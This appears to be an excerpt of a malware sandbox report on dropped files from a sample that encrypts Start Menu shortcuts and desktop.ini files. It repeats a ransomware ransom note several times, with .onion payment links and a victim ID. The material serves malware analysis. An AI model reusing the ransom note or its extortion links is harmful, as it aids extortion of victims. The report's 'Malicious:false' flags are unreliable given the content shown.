                                                                                                                                                      Preview: ...e.x.X.i..L.{...U=<Ob..{..H1).R..'.U4.R]=4......g.r..r[YF../.k..5y..ZKq1V.f=..}.9..p+.'{$?T.m..g.4*.j..v#..........iD;.U....=+.7a......u..3.:..&...=./....m;_)#..w!lF.A..{.Mw.E..H..tX.(....J..K...G&..j.4..%p=..Gj.&...k.mTM..d.?;.3..i.....gNk..Q....i2W$.z..LL+[.......q...#b...Y..7Dd..!;9w..G......P4..t .......p..*.....t>.R.W..[..y.X..."......7.e..*.....+bu.B#K..$|....4....g..g..Ww.S0B..*0.4....Q.......d]...\.o...ECd.....m....K.8.Zys..g.5.4.{...Q...y.f.... x..[.H..*%..N.o.n..U3...0.I)..j.....S...8-_.V......A=..|..vd.U.9.r.}PP..].G`..N.ztVV..D.&I.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 9
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2272
                                                                                                                                                      Entropy (8bit):7.163038173744728
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:3GyHHrDfJRRDR+voJtL1BpApTlzCwgck38Xjr:3LHLTJPaeRAPzTEQ
                                                                                                                                                      MD5:C5C2948156F4ACF050ABEB107F60B2A2
                                                                                                                                                      SHA1:0279185EA911D915502D5F36840C92BE5969D0B9
                                                                                                                                                      SHA-256:26AEEE219ED4BC176A8206F5B5509D072DD4F9F4D3E7E87ACE22AD13CF8332F1
                                                                                                                                                      SHA-512:7ADD4DA7E73BAB241A83080CE3DA2790DD48BF708757063F192897C0C01DE824395FCA27F47F992FDE985E84BE8789F2AD0931F7FB6DF28345254CC84EA287F2
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: u..P1.....0d.XC....,.x.Jv....o..`Y.%.r".p....)..E..i... &...b..W;.5..Q...e/...~.9L.(Z..P.,^...!W[.U,..v.XYl.U.Y"C..^._@..Y.+..3...L..f...|.....71..'..0F......oL ;.:..s.......ex...M..(.P..%7%S <..GI1Zl...p...#...*.%....D.@..n..l....d............W.Cz.8;.t...@../j...k..r>U.&..i[......\..EP.`.....d.3i.i.b..??..G..8Z.........S.i]A...uY..3...1.b..#eM4G.lj'...0.v%...$)....,T`.U..+].|...u..3_D....r..7.f.CsB.J..3...cN4$.%.QuN..Rm.".c....ob..@@.:~.|.f.Q...L.._.XD.o...)$.F.....R.=...`;6...%4V.I..>..I.~U.a=.\g.n.`.3......K..Z..@7..p..+{..]#...=...9n....k...[NFrG.k..p....*.ifh.c..........``/N.b....9.6...G...B..y ..k.M$..@/..8.....fr.(.z..\..{...d.."=..D...."....o.v..?..i..'......H.......d.s..4~gn....]...vR32A.@.@ i.......+.@...B._7l..2..K.T.`g>.....wNugW.wY..e5v\(p..F....P5B,.M...l[.%.3.. .8...'-...1...H..To...R.C-....ELd......Ff...P..ed..;.......o_Ud..^....~>5`}U.4.. .beb.X.i%....ZMw.4`|}^.}..;..l...Y.U......?.(.2..Xv>..&..:.."..Z.. m..e.S8.j.d~
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2112
                                                                                                                                                      Entropy (8bit):7.078954404403308
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:FrMFFlXOjdkQRrLWVlAvpOM4OEi+uzCwgck38Ij:2jlXORkQdLWLAvF1EizTEdj
                                                                                                                                                      MD5:1494F8D10844FA40F894A7741F9745EE
                                                                                                                                                      SHA1:77A16CACCA9932E430263E6EEEB8D7F9775E0AE8
                                                                                                                                                      SHA-256:B151026BA825E5272B2E983C0615F7545813483176683C1D909748AC0FC57A42
                                                                                                                                                      SHA-512:092B8BC24F149A8915DE3E17FFFD3A844220C06AEE0F5A16D708FDB363E007B400E5DE0489BA2F34161AD589E619AF4E484B2D8B2D1A4B3732F45B8C0FECE16C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .E.I.i'.i. .A....<.fW....q^i}...?iO.. Vb.&...B.w.F.};&.X..U......`.. '..?..l=..:4c..=.'\..X..Q. .p....PE..]sh..?.s.n..D+#.8.+&....9.ax....v..r..>..s.G.u.....EQ....?....".....c.<..eh.c.s._6.......G4.l.E..'0..kA...=...J.+n..Y.R..j.Y...v-.-...8Y....ubNi.)}*.5,%.*G?w'e.@..g.P]._.G4..|.Vz.Y2!.]n..D..*o.....U.50.u...X2U...z.U%.....o.5.8.U.t.H#....~'K....>il........>..?\g#.........Rn..m......Gf......*...d/.....]...R.KB.e...T...XI.&A.dY....._.........R..".m...(.../.e.7.+.....k.._u.i......-..E....Al....>..Mn.........%.%..N.I.X......g.**......h)...~...v.K..8U*..e.. Yk7.A+ab\..K.......)........J.......S..O!.B.V...7......q................$........k..i.}.V......7.....7?..^..s_A...ca.$.b(.Yhx*. ...a.XLb.2....&\..N......Fl..c...x....x&R.xN.wxX......v,...jo.4f0K..9.+3d`.P......9.....e...>.~..u....L...8O.F.g.....s.x..>..fT...ev..!.$..l....?.b)-..@H.Ea..Q...)..n.->...`.bB...<L.5.......*.VZ.....D. .UI...Y*.Q"n...:...5.r.c.D...s.`...@YEj.]...
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1120
                                                                                                                                                      Entropy (8bit):5.680136071572608
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:VcDn/MgM8FfePBzK8sevWAVgKTaCB7RZ0cHYIgtyUzXr:V4dspzCwgck38C
                                                                                                                                                      MD5:F245EFA8F85C3370191E8412B7C25E75
                                                                                                                                                      SHA1:8529FE9B937FD94FE074AEF2186959FA462F1EB9
                                                                                                                                                      SHA-256:21AAFAD08DCF1FA2DBB9310F7D4D43DC072ECBB4C768CDA3718592F82AFEBA3F
                                                                                                                                                      SHA-512:132270679EEDAA528C19CC77E5181C3CF4F972C35418724EEC321A750DCDB8D61FDF03E0F12A6F527822CBBA6B85FF2CFA319C0C48256BA191F41AC9B6F79FDD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .....N..K....>.m.R.4.y}Js......h..^.Y.....U.....<.R...F.2.$....B`........]..wP(.....n....m...A."S.}z2...o.j.P..5$.-.........0v....#T./....e.#..^...M8m............gH.s..(..p.h..YW.....!..P..S..I{.|..^}...w...n.~.G....Q.K...=eJ..z.....*....[.....O..I.+.}.S. .j~n..........0.GhG...q.*..VU...U67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1120
                                                                                                                                                      Entropy (8bit):5.620426831895631
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:NlnIBTdHsF8YAzK8sevWAVgKTaCB7RZ0cHYIgtyUznx8gSrRXP:NlnCjYAzCwgck38mx85P
                                                                                                                                                      MD5:6F9C841397842BB65CF845C724BD58F9
                                                                                                                                                      SHA1:4A3B02C1C2568A3175763E9C9AAD11171A322D91
                                                                                                                                                      SHA-256:2EE83960C2C6F180664686031BA6DF3A31767F04271D1963DE355C4FBCEA2E8D
                                                                                                                                                      SHA-512:8ABEACF05EB6FE055088A9B7AAA04BAA3E8634B7C8202A5B6C5D796B729992AE9E9F326937DCEF78B3B7099DE1A10211BBBFE4D518AA04C999A5FA81B0F62211
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..Z.{.K.4.....A......Ta.....*].g*8[z...:.p.d>M3<.3.A....".v..D.f..8.5eG.E=.<.W.RF.-N.hK.\.y.P7..X....L.}.Q...KU...,......X.j,.N......@DH_.i..+q...:.p&T.#..C..94.-..c...S.j).g..g...:}..AG.N<..../y.f...xN...<..n.:y....6cR.X.........gZ3DO........?$8.\.....&<.(y....`.x...r...D.....-...k.~67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1120
                                                                                                                                                      Entropy (8bit):5.630899513507742
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:3BaMomzCVMvxLgwF7eOxzK8sevWAVgKTaCB7RZ0cHYIgtyUzS:nCVep6azCwgck387
                                                                                                                                                      MD5:7E272654996F176E265FE3272E504A0B
                                                                                                                                                      SHA1:7C1B110B2232F052461D0F26316A674A464CF8FA
                                                                                                                                                      SHA-256:1BC743A35340678840C01A287E341275BFA1892960387C91997BA54BB13C6BAB
                                                                                                                                                      SHA-512:C9BF894116D559A26599F380E0EA54C92AEE9565D2C039A5858795332AFB7AF1B87F84679187D022DFD43D0AEC6A3C1B59FCFB16AA063447B562BAEBB12D00E5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: `....]..~......+....E..*..p..uc.(.+0I....$l.NK..u.Q.S.......<a$...%..!..2....;. z.$..r..:P....s.\...a........r.}C\.....I.OZ ....{@./..P.....)........P._.r3.C...v...g.>....h.w}-.C...z....s............<.5...-.........o...\!..g...b...]..vx.z,uA...)F`.wb......]...Z...o..[*.DWp...oKz.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Command Prompt.lnk
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2096
                                                                                                                                                      Entropy (8bit):7.084589720470217
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:mzUG24JfJiRtCz11cWuVKjkHEMlzCwgck38dy:mzG4JfJiTCzLNu4QpzTEyy
                                                                                                                                                      MD5:0D35A8A616BEAB41550C38AA8E30F5BA
                                                                                                                                                      SHA1:48DC5BCD6265DB248C511742192C1313FBCD8B0E
                                                                                                                                                      SHA-256:2A620532110A8D19A8B79218C5A54C6B8E572611891FB74D33CB7502CFD2DA06
                                                                                                                                                      SHA-512:C4ED3ACC18774DE7282155B8A5225ABFB7CF4280EE687F0B5674C4E66C705AD49F1E59877B13ECB668AE88784341E27C0AE92877EF831064C0BA5597A537D5E5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: D..}.d.F.W.^%.....}L.~...g...X.....D.......X....U...R'..SBI0...~.aG....x#:....Bo.1.U*W.....oG....K.C.....*%..!j(.k.!I?.]...US.%.....l.'.Z..E}..waw..=G...LQZs....w-..`..}.v.Gy.......r..w.}..x..pi...... #.q50.c..%....+."!~v5zH.....R......`...h..].~.a.u.3x.g.q..o.._!..`.We..7}.B.r....0.#.n'/4..R+ma..^w<>..7..'$..<%mC.)...%.g...]T.'....,.....Y,....,.]...rAsQ.Z.....N.$.u.L..9s.@.<p..V.oM,..G....|.`L.\.gt..A..(.Q.)br.t......T6kzq..C...NfKS.>.."...H?w....#.W.....3;............[B.&......TT...^....z<..n.3M;..5z,,w..T.._....w.....0.^.!....t.$.f..`'g.G....G1.e........I.......v.......Z. I....]ac-.xl@..V`.....^..YD.L").a(.Q......F.8.R....7.........u.p9."..Z...o.%-U.6..].9uSI.Q..K0.t.....fXh@..,....-...[Y#.Y...wc.L.1*....m..$.r. .G.MT.[.(..C[..q..1.x..7T.M.&.........t..'L..c.........(..HM.>yZvKK.1K.m`i..% .(w..b..q`.aS....;.%@Pp..p[....U......!....?..1I.K..~W..Ly.2.A^T..F.Wa.9...f.h..A.=..G......?~M..!D.B+/....JA..Lj.T.p.Y+.QA..|.....p.....
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Control Panel.lnk
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1360
                                                                                                                                                      Entropy (8bit):6.256971752113864
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TB0r0ouys9NE1VzK8sevWAVgKTaCB7RZ0cHYIgtyUzob:V0rkFILzCwgck38N
                                                                                                                                                      MD5:A2CBD028A0F19749F278461A4BE1A581
                                                                                                                                                      SHA1:AB8DA2E91FA3DB89FBE331EA3A2722836A2E2E0E
                                                                                                                                                      SHA-256:9B7A74AC0DEDF08E682D9B66BDEB8F592680627D95038017556F1BFA0AB7C3DD
                                                                                                                                                      SHA-512:08B94DF306C78BD71803B4068E2E403BD336FC6D8E587B45E780E0D3A4886AEE108BBF8F8FD6220D79FCAF4D3F36E90095A8B6CA72BAD0AC576D28095B25842D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: D...2.'T.Ts.....p...n.S'0...-U..l1....VU..y.....q..t4(.)}T..Cm..F..n A........r=...|...V...A.$...{..dI[._$.A\`.. D...1..U..?.b......t..Sy.B..fV..'...h.tWMW4g....h9.t.....=...u..w..>....h.f.g.H*..."..2.Q`..:........(...;X...P.r.-'y.O.......{M}.r.b...yd.w.[...<\%D.=^(...$...u....H6.......!.......>...!.....at.:9........".;C.+K$B.t.'...90R.4aX..d..v.{.P.l..:F.O{...~..B..$s.ol....Od..2.....#hyq..>L..4'q..%V./....$,..`.~..........?.U.....9..!..g...........#.....:H.rK.........W..........~..1...&..}f....c4N.....67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1744
                                                                                                                                                      Entropy (8bit):6.819336350548717
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:WIdd+nSajbn4Mstzv60gdmwIgYUVtVDFF0TWNBuzK8sevWAVgKTaCB7RZ0cHYIg+:WIYSajbBszCJrNVDFF0T+uzCwgck38J
                                                                                                                                                      MD5:8096621B55721AAFB23FF56B292DCFDC
                                                                                                                                                      SHA1:0A5985F0F5D3FACFF066354B4093F6685AD3E33B
                                                                                                                                                      SHA-256:6608ED55C7A3627DD95A867E169E286A21245055C91A549EEB99580DA968CB61
                                                                                                                                                      SHA-512:11BC0B32F30F1DCB3820133F895BD49325F16CFDF860D4F26FB339FC696D803DDBBF32B73592203009029E6AF563590A3730C0450EE690E4881387B995FA4F1B
                                                                                                                                                      Malicious:false
